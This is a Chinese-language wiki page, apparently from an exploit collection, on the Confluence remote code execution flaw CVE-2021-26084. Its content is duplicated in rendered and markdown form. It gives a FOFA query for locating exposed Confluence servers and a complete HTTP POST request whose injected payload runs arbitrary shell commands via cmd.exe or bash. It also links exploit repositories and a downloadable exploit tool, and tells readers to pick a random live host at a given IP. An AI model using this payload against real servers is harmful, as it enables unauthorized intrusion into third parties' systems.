fofamini-wiki

登录白背景

源码

CVE-2021-26084 Confluence 远程代码执行

一、漏洞简介

CVE-2021-26084 Confluence 远程代码执行

二、fofa

app="ATLASSIAN-Confluence"

三、复现过程

poc

POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1
Host: 47.119.179.26:8090
Content-Length: 1068
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://47.119.179.26:8090
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://47.119.179.26:8090/login.action?os_destination=%2Findex.action&permissionViolation=true
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=B62AC1837C6D777CA7DE138A779E2511
Connection: close

queryString=aaaaaaaa%5Cu0027%2B%7BClass.forName%28%5Cu0027javax.script.ScriptEngineManager%5Cu0027%29.newInstance%28%29.getEngineByName%28%5Cu0027JavaScript%5Cu0027%29.%5Cu0065val%28%5Cu0027var+isWin+%3D+java.lang.System.getProperty%28%5Cu0022os.name%5Cu0022%29.toLowerCase%28%29.contains%28%5Cu0022win%5Cu0022%29%3B+var+cmd+%3D+new+java.lang.String%28%5Cu0022命令命令命令命令命令命令命令命令命令命令命令%5Cu0022%29%3Bvar+p+%3D+new+java.lang.ProcessBuilder%28%29%3B+if%28isWin%29%7Bp.command%28%5Cu0022cmd.exe%5Cu0022%2C+%5Cu0022%2Fc%5Cu0022%2C+cmd%29%3B+%7D+else%7Bp.command%28%5Cu0022bash%5Cu0022%2C+%5Cu0022-c%5Cu0022%2C+cmd%29%3B+%7Dp.redirectErrorStream%28true%29%3B+var+process%3D+p.start%28%29%3B+var+inputStreamReader+%3D+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3B+var+bufferedReader+%3D+new+java.io.BufferedReader%28inputStreamReader%29%3B+var+line+%3D+%5Cu0022%5Cu0022%3B+var+output+%3D+%5Cu0022%5Cu0022%3B+while%28%28line+%3D+bufferedReader.readLine%28%29%29+%21%3D+null%29%7Boutput+%3D+output+%2B+line+%2B+java.lang.Character.toString%2810%29%3B+%7D%5Cu0027%29%7D%2B%5Cu0027

exp地址

https://github.com/Ta0ing/CVE-2021-26085

https://github.com/h3v0x/CVE-2021-26084_Confluence

https://github.com/FanqXu/CVE-2021-26084

复现

1.随机挑选一个

http://47.119.179.26:8090/

利用工具

CVE-2021-26085.exe

**CVE-2021-26084 Confluence** 远程代码执行
========================================

一、漏洞简介
------------

> **CVE-2021-26084 Confluence** 远程代码执行

二、fofa
------------

-   app="ATLASSIAN-Confluence"

三、复现过程
------------

#### poc

POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1
    Host: 47.119.179.26:8090
    Content-Length: 1068
    Pragma: no-cache
    Cache-Control: no-cache
    Upgrade-Insecure-Requests: 1
    Origin: http://47.119.179.26:8090
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://47.119.179.26:8090/login.action?os_destination=%2Findex.action&permissionViolation=true
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=B62AC1837C6D777CA7DE138A779E2511
    Connection: close
    
    queryString=aaaaaaaa%5Cu0027%2B%7BClass.forName%28%5Cu0027javax.script.ScriptEngineManager%5Cu0027%29.newInstance%28%29.getEngineByName%28%5Cu0027JavaScript%5Cu0027%29.%5Cu0065val%28%5Cu0027var+isWin+%3D+java.lang.System.getProperty%28%5Cu0022os.name%5Cu0022%29.toLowerCase%28%29.contains%28%5Cu0022win%5Cu0022%29%3B+var+cmd+%3D+new+java.lang.String%28%5Cu0022命令命令命令命令命令命令命令命令命令命令命令%5Cu0022%29%3Bvar+p+%3D+new+java.lang.ProcessBuilder%28%29%3B+if%28isWin%29%7Bp.command%28%5Cu0022cmd.exe%5Cu0022%2C+%5Cu0022%2Fc%5Cu0022%2C+cmd%29%3B+%7D+else%7Bp.command%28%5Cu0022bash%5Cu0022%2C+%5Cu0022-c%5Cu0022%2C+cmd%29%3B+%7Dp.redirectErrorStream%28true%29%3B+var+process%3D+p.start%28%29%3B+var+inputStreamReader+%3D+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3B+var+bufferedReader+%3D+new+java.io.BufferedReader%28inputStreamReader%29%3B+var+line+%3D+%5Cu0022%5Cu0022%3B+var+output+%3D+%5Cu0022%5Cu0022%3B+while%28%28line+%3D+bufferedReader.readLine%28%29%29+%21%3D+null%29%7Boutput+%3D+output+%2B+line+%2B+java.lang.Character.toString%2810%29%3B+%7D%5Cu0027%29%7D%2B%5Cu0027

#### exp地址

https://github.com/Ta0ing/CVE-2021-26085

https://github.com/h3v0x/CVE-2021-26084_Confluence

https://github.com/FanqXu/CVE-2021-26084

#### 复现

1.随机挑选一个

http://47.119.179.26:8090/

![image-20210828123844549](/resource/CVE-2021-26084Confluence远程代码执行/6.png)

![](/resource/CVE-2021-26084Confluence远程代码执行/1.png)

#### 利用工具

[CVE-2021-26085.exe](/resource/CVE-2021-26084Confluence远程代码执行/CVE-2021-26085.exe)